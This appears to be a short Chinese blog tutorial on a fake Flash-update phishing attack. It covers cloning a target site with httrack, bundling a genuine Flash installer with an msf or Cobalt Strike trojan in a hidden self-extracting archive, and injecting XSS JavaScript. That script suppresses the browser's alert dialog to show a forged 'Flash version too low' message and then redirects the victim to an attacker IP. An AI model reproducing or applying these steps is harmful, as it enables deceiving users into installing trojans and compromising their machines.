水一篇☔️

  1. 安装完整页面爬取工具

    1
    2
    3
    # kali
    apt-get install httrack
    # yum install httrack –y

  2. 运行httrack,爬取需要爬取的页面,按提示填写

  3. 去比对官网页面修改不一样的地方,使首页和目标一样

  4. 下载flash正常exe,生成相应木马如msf/cs等

  5. 制作合成木马

    1. 将两个木马放在同一个目录下
    2. 填写以exe结尾的文件名image.png
    3. 点高级,进入自解压,填写解压绝对路径image.png
    4. 填写解压后的两个文件名image.png
    5. 选择全部隐藏image.png
    6. image.png

flash结合xss

1
2
3
4
5
6
7
8
9
10
window.alert = function(name){
var iframe = document.createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src",'data:text/plain,');
document.documentElement.appendChild(iframe);
window.frames[0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}
alert("您的FLASH版本过低,尝试升级后访问该页面! ");
window.location.href="http://192.168.0.110";